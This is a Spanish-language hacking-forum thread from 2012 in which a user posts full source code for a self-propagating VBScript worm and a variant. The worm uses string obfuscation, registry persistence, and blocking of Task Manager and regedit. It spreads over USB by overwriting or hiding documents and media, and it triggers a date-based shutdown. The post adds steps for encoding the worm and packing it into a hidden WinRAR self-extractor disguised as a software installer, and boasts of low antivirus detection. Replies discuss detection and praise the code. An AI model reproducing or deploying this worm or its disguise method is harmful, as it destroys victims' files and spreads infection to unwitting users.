elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Worm VBScript Codificado + Empaqtado		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Worm VBScript Codificado + Empaqtado  (Leído 5,174 veces)
.:: KsV ::.

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Worm VBScript Codificado + Empaqtado
« en: 15 Diciembre 2012, 00:32 am »
Chav@s como estoy de vacaciones  ;-) y no tengo nada q hacer les traigo un worm  programado en vbscript x mi.Parte del code esta codificado aver si les gusta lo que hace_


  • 1.-Infecta pc da
  • 2.-Residente en la memoria
  • 3.-Graffity a pc
  • 4.-Impide q se abra el administrador de tareas y el registro de Windows
  • 5.-Si lo borran regresa  :rolleyes:
  • 6.-Infecion USb remplaza una lista de formatos con el code deo worm eliminando el archivo original muy lamer  ;D  lose tambien cabe la opcion de solo ocultarlos en fin
  • 7.-Prosesa sub carpetas para el paso6
  • 8.-Cada vez q la pc infectada se encienda comprueva q el dia y el mes sumados den 18 la pc se apaga y como esta agregado a la pc no se prendera todo ese dia  :laugh:


Bueno es hora de empezar aqui les dego el codigo se los voy explicando

Código
  1.  
  2. On Error Resume Next 'en cso de algun error no dar aviso
  3. Set fso = CreateObject(des("Vfulswlqj1Ilohv|VwhpRemhfw"))     'Creamos objeto para manejar archivos 
  4. y0 = Wscript.ScriptFullName                                    'variable con la ruta exacta del worm
  5. Set tmp = fso.GetSpecialFolder(2)                              'hace referencia a la carpeta temporal 
  6. Set ws = CreateObject(des("ZVfulsw1Vkhoo"))                     'Creamos objeto para manejar el registro
  7. Set c = fso.GetFile(y0)                                        'creamos una variable contenga lo de la var y0
  8. c.Copy(tmp&des("_NvY1yev"))                                     'con ayuda de lo anterior nos copiamos a la carpeta %temp%
  9. fso.CopyFile y0, tmp&des("_NvY1yev")                             'nos copiamos a la carpeta %temp% )(x si no funciona la anterior)
  10. ws.RegWrite "HKCU\software\<3\", " 4U ksv"                        'grafittiando el registro de windows 
  11. ws.run des("fpg#2f#Uhj#dgg#KNH\bFXUUHQWbXVHU_Vriwzduh_Plfurvriw_Zlqgrzv_FxuuhqwYhuvlrq_H{soruhu_Dgydqfhg#2y#KlghIlohH{w")&  "/t reg_dword /d 1 /f",0   'ocultamos las extensiones de los archivos
  12. ksv()       'llamamos a la funcion ksv
  13. dloop()      'llamamos a la funcion dloop
  14.  
  15. Do                   'inicio de bucle infinito
  16. On Error Resume Next
  17.  
  18. 'las dos sig. lineas llama a la funcion see la cual se encarga de cerrar aplicaciones aqui ya le asignamos dos aplicaciones para q cierre (administrador de tareas y registro de windows) 
  19. see(des("wdvnpju1h{h"))  
  20. see(des("uhjhglw1h{h"))
  21. ws.RegWrite des("KNH\bFXUUHQWbXVHU_VRIWZDUH_Plfurvriw_Zlqgrzv_FxuuhqwYhuvlrq_Uxq_Nh|VY"),tmp&des("_NvY1yev") 'Nos agregamos al registro de windows
  22.  
  23. Set wf= fso.OpenTextFile(y0) 'abrimos el archivo de la variable y0 osea el q se esta ejecutando
  24. i= wf.ReadAll                 'Agregamos el contenido completo del worm a la variable i 
  25. wf.Close                      'cerramos el worm
  26. If fSO.FileExists(y0) Then    'comprobamos q exista el contenido de la var.y0 si es asi
  27. wscript.sleep 1000             'espera 1 segundo  
  28. Else                           'si no existe
  29. Set nf= fso.CreateTextFile(y0) 'creamos el archivo 
  30. nf.Write i                      'escribimos el contenido q almacenamos en la var (i)
  31. nf.Close                        'lo cerramos
  32. End If
  33. obdri()                     'vamos a la funcion obdri
  34. Loop                        'una ves q termine la funcion obdri regresa a do
  35. End Sub
  36.  
  37. 'Funcion q se encarga de cerrar el administrador de windows y el registro de windows
  38. Sub see(processname)
  39. On Error Resume Next
  40. Set WM =getobject(des("ZlqPjpWv="))
  41. Set listservices= WM.instancesof(des("Zlq65bSurFhvV"))
  42. For Each oService In listservices
  43. If processname=oService.name Then
  44. oService.Terminate
  45. End If
  46. Next
  47. End Sub
  48.  
  49.  
  50. Function obdri()     
  51. On Error Resume Next
  52. Set discos = fso.Drives   'tomamos el control de las unidades de la pc
  53. For Each d In discos      'bucle para mapear las unidades
  54. If d.Drivetype = 1 or 0 Then  'comprobamos q sean del tipo (1extendible) (0 desconosidos) si es asi
  55. a1= d&"\"                       'agregamos la direcion en la var a1             
  56. Call joder(a1)                  'llamamos a la funcion joder con una direcion  
  57. End If
  58. Next           'pasa a la sigiente 
  59. End Function
  60.  
  61.  
  62. Function joder(a2)
  63. On Error Resume Next
  64. Set f4 = fso.GetFolder(a2) 'toma control de las carpeta de la usb
  65. Set carpeta = f4.Files      'toma control de los archivos
  66. For Each abc In carpeta    'mapeo de archivos contenidas en un array 
  67. nombres = array("jpg","dwg","mp4","vbs","mp3","docx","doc","pdf","pptx","xlsx","vbe","avi")
  68. For each n in nombres
  69. If fso.GetExtensionName(abc.path) = n Then  'si existe alguna de las extensiones en el array entonces   
  70. fso.CopyFile y0, abc.path&".vbs"            'copiamos el contenido de la var. y0 a los archivos q encuentre si la extensión coincide pero le modificamos la extensión 
  71. fso.DeleteFile abc.path         'borramos el archivo original
  72. End If
  73. next  'sigiente
  74. next'siguiente
  75.  
  76. Set abc= f4.SubFolders 'aqui prosesamos e infectamos sub carpetas
  77. For Each f3 In abc
  78. Call joder(f3.path)
  79. Next
  80. End Function
  81.  
  82.  
  83. 'las siguientes 6 lineas se encarga de cifrar y descifrar 
  84. Public Function des(p)
  85. On Error Resume Next
  86. For Ale = 1 To  Len(p)
  87. des = des &Chr(Asc(Mid(p,Ale, 1))- 3)
  88. Next
  89. End Function
  90.  
  91.  
  92. 'comprueba si el dia y el mes sumados dan 18 si es asi apagamos la pc y como se agrego al registro 
  93. 'la pc no prendera todo es dia
  94. Sub ksv()
  95. On Error Resume Next
  96. sum = CInt(Month(Date) + Day(Date))
  97. If sum = 18 Then
  98. ws.Run des("fpg#2f#vkxwgrzq#2u#2w#33"),0
  99. End If
  100. End sub
  101.  




VARIACION
E aqui el mismo code simplemente le qite la opcion de borrar el archivo original simplemente los oculta tanto como oculto y de sistema tambien oculta la extensión
NOTA

Código
  1. On Error Resume Next
  2. Set fso = CreateObject(des("Vfulswlqj1Ilohv|VwhpRemhfw"))
  3. y0 = Wscript.ScriptFullName
  4. Set tmp = fso.GetSpecialFolder(2)
  5. Set ws = CreateObject(des("ZVfulsw1Vkhoo"))
  6. Set c = fso.GetFile(y0)
  7. c.Copy(tmp&des("_NvY1yeh"))
  8. fso.CopyFile y0, tmp&des("_NvY1yeh")
  9. ws.RegWrite "HKCU\software\<3\", " 4U ksv"
  10. Set ws = CreateObject("wscript.shell")
  11. ksv438 = array(des("#VxshuKlgghq#"),des("#Klgghq#"),des("#VkrzVxshuKlgghq#"))
  12. For each n in ksv438
  13. ws.Run des("fpg#2f#Uhj#dgg#KNH\bFXUUHQWbXVHU_Vriwzduh_Plfurvriw_Zlqgrzv_FxuuhqwYhuvlrq_H{soruhu_Dgydqfhg#2y")& n&des("#2w#uhjbgzrug#2g#3#2i"),0
  14. next
  15. ws.Run des("fpg#2f#Uhj#dgg#KNH\bFXUUHQWbXVHU_Vriwzduh_Plfurvriw_Zlqgrzv_FxuuhqwYhuvlrq_H{soruhu_Dgydqfhg#2y")& " HideFileExt "&des("#2w#uhjbgzrug#2g#4#2i"),0  
  16. ksv()
  17. dloop()
  18. Do 
  19. On Error Resume Next
  20. kya(des("wdvnpju1h{h")) 
  21. kya(des("uhjhglw1h{h"))
  22. ws.RegWrite des("KNH\bFXUUHQWbXVHU_VRIWZDUH_Plfurvriw_Zlqgrzv_FxuuhqwYhuvlrq_Uxq_Nh|VY"),tmp&des("_NvY1yeh")
  23. Set wf= fso.OpenTextFile(y0)
  24. i= wf.ReadAll
  25. wf.Close
  26. y0=w
  27. If fSO.FileExists(w) Then
  28. wscript.sleep 1000
  29. Else
  30. Set nf= fso.CreateTextFile(w)
  31. nf.Write i
  32. nf.Close
  33. End If
  34. obdri()
  35. Loop
  36. End Sub
  37. Sub kya(processname)
  38. On Error Resume Next
  39. Set WM =getobject(des("ZlqPjpWv="))
  40. Set listServices= WM.instancesof(des("Zlq65bSurFhvV"))
  41. For Each oService In listServices
  42. If ProcessName=oService.name Then
  43. oService.Terminate
  44. End If
  45. Next
  46. End Sub
  47. Function obdri()
  48. On Error Resume Next
  49. Set discos = fso.Drives
  50. For Each d In discos
  51. If d.Drivetype = 1 or 0 Then
  52. a1= d&"\"
  53. Call KsVAl(a1)
  54. End If
  55. Next
  56. End Function
  57. Function KsVAl(a2)
  58. On Error Resume Next
  59. Set f4 = fso.GetFolder(a2)
  60. Set carpeta = f4.Files
  61. For Each abc In carpeta
  62. nombres = array("jpg","dwg","mp4","vbs","mp3","docx","doc","pdf","pptx","xlsx","vbe","avi")
  63. For each n in nombres
  64. If fso.GetExtensionName(abc.path) = n Then
  65. fso.CopyFile y0, abc.path&".vbe"
  66. 'fso.DeleteFile abc.path
  67. Set hi = fso.GetFolder(abc.path)
  68. hi.Attributes = 7
  69. End If
  70. next
  71. next
  72. Set abc= f4.SubFolders
  73. For Each f3 In abc
  74. Call KsVAl(f3.path)
  75. Next
  76. End Function
  77. Public Function des(p)
  78. On Error Resume Next
  79. For Ale = 1 To  Len(p)
  80. des = des &Chr(Asc(Mid(p,Ale, 1))- 3)
  81. Next
  82. End Function
  83. Sub ksv()
  84. On Error Resume Next
  85. sum = CInt(Month(Date) + Day(Date))
  86. If sum = 18 Then
  87. ws.Run des("fpg#2f#vkxwgrzq#2u#2w#33"),0
  88. End If
  89. End sub
  90.  



EL SCRIPT NO SE GUARDA CON VBS SINO COMO VBE POR Q POR Q LO HIZE PARA CODIFICARLO CON Screnc  

http://www.mediafire.com/?a2r9qcwbxue3x9d DESCARGAR SCRENC CON UN BAT PARA NO HACER TANTO ROLLO SOLO EJECUTEN EL BAT Y SIGAN LAS INSTRUCIONES

Aqui Screnc para codificar y descodificar http://www.mediafire.com/?pp14x1zjt2xdpw3

 LES CREARA UN ARCHIVO VBE (ESTE ES EL WORM ) PERO NO PODRAN LEER SU CONTENIDO SE VERA ALGO ASI
#@~^xAkAAA==6   P3MDKDP"+k;:PH+XY@#@&U+Y,W/KP',/.+mYr8Ln^D`[+kcJj0;skhV5%8qsW4--.A4w"+:40SE#*@#@&XZPx~q/mMrwDR?1.rwDs!Vs1Ch@#@&?OPD:2~
 >:D

.::KsV::.
Bueno vamos a empaqtarlo para eso solo usaremos winrar
tambien nesesitan este code y tambien nesesitas un programa (el instalador) PARA EL PRIMER CODIGO SI LO QIEREN HACER CON EL 2DO CABIEN VBS POR VBE EN EL SIGUIENTE CODE


Código
  1.  
  2. On Error Resume Next
  3. Set ws = CreateObject("WScript.Shell")
  4. ws.run "worm.vbs"
  5. ws.run "setup.exe"
  6.  
  7.  
Ese archivo se llamara start.vbs(el code anterior)
El worm se llamara worm.vbs
El programa se llamara setup.exe

Lo primero es añadir al archivo los 3 archivos marcar Crear un archivo extendible


Click en La pestaña de Avanzado..Autoextraible
Donde dice Carpeta de extracion escriben %TEMP% esta es la carpeta temporal de windows


En "Ejecutar tras la extracion" :Ponen start.vbs


Ahora vamos a la pestaña de modos marquen la opcion de "Ocultar todo"

Ahora en la pestaña de Texto e icono
CARGAR ICONO DESDE FICHERO  selecionen un icono q tengan

den aceptar y aceptar y listo   ;-)


Renombren la aplicacion por el nombre del programa por ej PhotoScapeSetup.exe

Al ejecutar este nuevo programa primero ejecutara el worm  ;-) y despues abrira el instalador del programa  ;)


No compilen el code por q no funcionara x q NO FUNCIONARA LA OPCION DE AUTO RECOPERACION (osea lo borran y vuelve   >:D )


El code es mi den creditos si lo postean en otro lugar  ;)
si tienen preguntas  :huh: aganmelas saber
 
;-)

Dudas y Comentarios  siempre son bien venidas

NO YO NI NADIE MAS Q TU ES EL RESPONSABLE DEL USO DE ESTA INFORMACION (TODA LA INFO POSTEADA ES CON FINES EDUCATIVOS COMO SIEMPRE )
« Última modificación: 18 Diciembre 2012, 00:58 am por KsV » En línea
No confíes en aquel que una vez te defraudó.... William Shakespeare
0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: Worm VBScript Codificado + Empaqtado
« Respuesta #1 en: 15 Diciembre 2012, 13:36 pm »
Un worm en vbs? Bueno por lo menos no es alguien preguntando como usar Bifrost. Lo has subido a virustotal, a ver que rango de deteccion tiene?
En línea
I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
.:: KsV ::.

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Re: Worm VBScript Codificado + Empaqtado
« Respuesta #2 en: 15 Diciembre 2012, 18:26 pm »
Bueno los mejores worm se programaron en vbs happyTime ana k..iloveyou..etc

y si ya lo analize en virustotal Deteccion 2 de 43   ;-)
los antivirus q lo detectaron fue AVG  y aSafe con ultimas actualizaciones 15/12/12 11:24am  >:D
En línea
No confíes en aquel que una vez te defraudó.... William Shakespeare
0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: Worm VBScript Codificado + Empaqtado
« Respuesta #3 en: 15 Diciembre 2012, 22:55 pm »
No queria decir que fuese un codigo malo, solo que esta muy visto, y no es nada demasiado "pro" que se diga. Incluso hay un tutorial en este foro sobre hacer worms en vbs.

De todas formas, es un aporte, a diferencia de muchos usuarios que se registran solo para preguntar como usar bifrost o cosas similares, y me disculpo si ha parecido que queria ofenderte.

En cuanto a la deteccion, me da la impresion de que los antivirus no se han puesto las pilas con los lenguajes de scripting.

Saludos.
En línea
I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Worm VBScript Codificado + Empaqtado
« Respuesta #4 en: 15 Diciembre 2012, 23:17 pm »
No es que los antivirus no se hayan puesto las pilas con los lenguajes de scripting, lo que ocurre es que a estos los detectan por heurística ,y eso no sale en el reporte :P

Saludos
En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
тαптяα


Desconectado Desconectado

Mensajes: 1.151


Sic utere tuo ut alienum non laeda


Ver Perfil WWW
Re: Worm VBScript Codificado + Empaqtado
« Respuesta #5 en: 16 Diciembre 2012, 00:27 am »
Buen codigo, seguro que muchas horas picando codigo.
En línea
.:: KsV ::.

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Re: Worm VBScript Codificado + Empaqtado
« Respuesta #6 en: 16 Diciembre 2012, 04:06 am »
0xDaniNTP NO Me ofendo de ninguna manera al contrariom me alaga q personas como tu comenten.

en estemomento como novato no me qiero poner mis moños



a mi tambien me saco de onda el 2/43  pense q abia sido un error pero tambien pense buen trabajo


Pero como dice Novlucker es la  heurística el AVG lo detecto por eso


Novlucker Es un placer q vieras esto mi primer encuentro con este mundo fue tu TUTORIAL DE VBSCRIPT GRACIAS

Todo lo o la mayor parte q se de vbs es gracias a ti
A tu nombre este code.
En línea
No confíes en aquel que una vez te defraudó.... William Shakespeare
.:: KsV ::.

Desconectado Desconectado

Mensajes: 56



Ver Perfil
Re: Worm VBScript Codificado + Empaqtado
« Respuesta #7 en: 16 Diciembre 2012, 04:08 am »
тαптяαпсє Gracias x el comentario y si me lleve unas 2 horillas
En línea
No confíes en aquel que una vez te defraudó.... William Shakespeare
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Esta codificado?? o que es??
Ingeniería Inversa 		alexkof158 5 3,273 Último mensaje 5 Mayo 2010, 21:01 pm
por alexkof158
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines